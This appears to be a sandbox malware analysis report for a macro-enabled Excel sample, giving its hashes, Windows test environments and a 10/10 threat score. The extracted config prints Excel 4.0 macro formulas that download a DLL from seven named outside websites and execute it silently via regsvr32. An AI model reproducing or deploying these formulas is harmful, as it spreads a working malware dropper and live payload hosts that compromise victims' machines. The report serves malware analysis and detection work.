General
-
Target
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f
-
Size
20KB
-
Sample
241111-wsa57atbmc
-
MD5
bb81f2a0f22a048d07799945931ab8ec
-
SHA1
0c814100efe4675ce01ab4df4787d64ba46d1ce3
-
SHA256
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f
-
SHA512
1507d4117648434128feed29df17ffa87e7d55d23cb038a612682c0d50ec883ffd10ed8672622009c0741e277ef2489f5629e5e6f4ad578e979a10b7e78a06f0
-
SSDEEP
384:+JaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:EiIN3o4FLTCBn9kC+xbLF1
Behavioral task
behavioral1
Sample
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0)
=IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0))
=IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0))
=IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0))
=IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0))
=IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0))
=IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0))
=IF('SCWVCV'!D26<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
=RETURN()
Targets
Score 10/10